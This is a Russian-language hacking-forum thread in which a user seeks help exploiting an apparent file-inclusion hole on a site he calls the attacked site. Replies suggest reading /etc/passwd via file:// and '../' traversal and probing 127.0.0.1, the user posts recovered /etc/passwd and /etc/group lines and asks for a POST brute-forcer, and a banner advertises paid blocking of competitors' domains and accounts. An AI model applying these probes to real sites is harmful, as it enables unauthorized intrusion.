УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
File include[помощь]

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

11.10.2016, 20:01

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).

11.10.2016, 20:05

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от sinfo

sinfo said:
↑
Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).

Так и должно быть.. Ну не совсем может там не инклуд вовсе

11.10.2016, 20:07

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
Так и должно быть

Ну а как мне увидить phpinfo атакуемого сайта?

11.10.2016, 20:15

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от sinfo

sinfo said:
↑
Ну а как мне увидить phpinfo атакуемого сайта?

а зачем тебе phpinfo атакуемого сайта?

вопрос вообще про инклуд сначала был

/etc/shells /etc/passwd по классике попробуй проинклудить

11.10.2016, 20:46

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от t0ma5

t0ma5 said:
↑
а зачем тебе phpinfo атакуемого сайта?
вопрос вообще про инклуд сначала был
/etc/shells /etc/passwd по классике попробуй проинклудить

Так если у него инклуд нахрена это всё,тем более если РФИ

11.10.2016, 20:47

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

site.com/blablabla=

Цитата:

Сообщение от sinfo

sinfo said:
↑
Ну а как мне увидить phpinfo атакуемого сайта?

site=i.txt

в i.txt

а что если, file:///etc/passwd || http://127.0.0.1:80

11.10.2016, 21:18

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
site.com/blablabla=
site=i.txt
в i.txt
а что если, file:///etc/passwd ||
http://127.0.0.1:80

в i.txt - открыл как текстовый тхт.

file:///etc/passwd || http://127.0.0.1:80 - нет результатов(((

11.10.2016, 21:35

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от sinfo

sinfo said:
↑
в i.txt - открыл как текстовый тхт.
file:///etc/passwd ||
http://127.0.0.1:80
- нет результатов(((

тогда это не инклуд

11.10.2016, 23:01

strelok20094

Guest

Сообщений: n/a

Провел на форуме:
24770

Репутация: 2

так ты файл читать можешь локальный?

file:///etc/passwd

/blablabla=../etc/passwd

#10

12.10.2016, 00:47

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

file:///etc/passwd да вот только что нашел,ток в другом месте

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

/etc/group

crontab:x:102:

Debian-exim:x:103:

mlocate:x:104:

ssh:x:105:

А есть брут??работающий с post запросами?

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход